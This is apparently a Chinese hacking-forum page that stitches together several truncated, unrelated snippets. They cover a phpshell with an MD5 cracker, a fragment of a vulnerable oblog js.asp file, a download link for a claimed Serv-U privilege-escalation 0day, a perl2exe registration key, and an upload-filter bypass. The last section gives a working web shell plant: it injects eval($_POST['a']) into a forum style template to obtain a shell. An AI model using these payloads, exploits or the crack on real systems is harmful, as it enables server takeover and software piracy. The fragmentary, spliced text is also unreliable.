躲到一个阴暗的社会角落里去了...找得到就找...呵呵

来自:http://www.hackm.com/read.php?tid-2014.html

作者:28度的冰

又一个来自国外的phpshell，在milw0rm看到的。
关于为什么起这个名字，作者说：“Couldn't think of a name so it became "Shell I"...”
phpshell不稀奇了，介绍这个phpshell主要是他有一个比较有新意的功能：md5 cracker with custom options
可以直接在这个phpshell中利用当前网站服务器进行md5的暴力破解。

漏洞文件：js.asp

<%
Dim oblog
set oblog=new class_sys
oblog.autoupdate=False
oblog.start
dim js_blogurl,n
js_blogurl=Trim(oblog.CacheConfig(3))
n=CInt(Request(”n”))
if n=0 then n=1
select case CInt(Request(”j”))
case 1
call tongji()
case 2
call topuser()
case 3
call adduser()
case 4
call listclass()
case 5
call showusertype()
case 6
call listbestblog()
case 7
call showlogin()
case 8

通杀所有版本SERV-U的提权程序,未做测试，内附动画演示,

哪个小朋友试了拜托写下...THX~~~

下载地址:http://www.live-share.com/files/207829/serv-u_0day.rar.html

注：方便编译perl写的EXP。就像以前发过的可以将php的exp转换成exe的 Bambalam PHP EXE Compiler/Embedder 。

来源：7jdg's Blog

很久没有用过这东西了,今天从机子上找出来一个是8.4版的,老的不能用了..来个新的,带注册机
引用
C:p2x-8.80-Win32>perl2exe -register
Perl2Exe V8.80 Copyright (c) 1997-2006 IndigoSTAR Software
Please enter your registration key, or press enter to cancel
1v1:name:20070320,54419
Registered
引用
C:p2x-8.80-Win32>perl2exe
Per

作者：sk@scan-associates.net
来自：http://www.securiteam.com/
翻译：DemonAlex
更新：2006年11月11日 　

摘要:
下文是为了帮助那些希望能掌握这个漏洞的运用、并想得知如何保护自己免受这种漏洞攻击的人了解该漏 洞的本质而写的。

详细资料:

1.0绪论
当一台机器只开放了80端口(这里指的是提供HTTP服务)时，可能你的大多数漏洞扫描器都不能给到你很多 有价值的信息(漏洞信息)，倘

作者: close999
来源:红狼安全小组(www.wolfexp.net,www.crst.com.cn)


原理    : Reg/User_RegCheck.asp 用户名只过滤 cdx,cer,asp,asa
突破的前提条件是      : 服务器是win2003 全功能的空间


**************************************************
'函数名：UserNamefilter(
'作   用：过滤用户名(增强过滤,用户名现

来自安全警戒线论坛~~

来源:猪猪's blog

方式1 模板法

进入后台， 风格模版设置 ，在随便一行写代码
记住，这代码必须顶着左边行写，代码前面不可以有任何字符。
EOT;
eval($a);
print <<

例如，我写完某一行为。
.headurl { color:#ffffff;}
EOT;
eval($_POST[’a’]);
print <<.index_font{color: #3A4F6C;background-color:#EBEBEB; font-weight:bold;padding: 5px;}

而后得到一个shell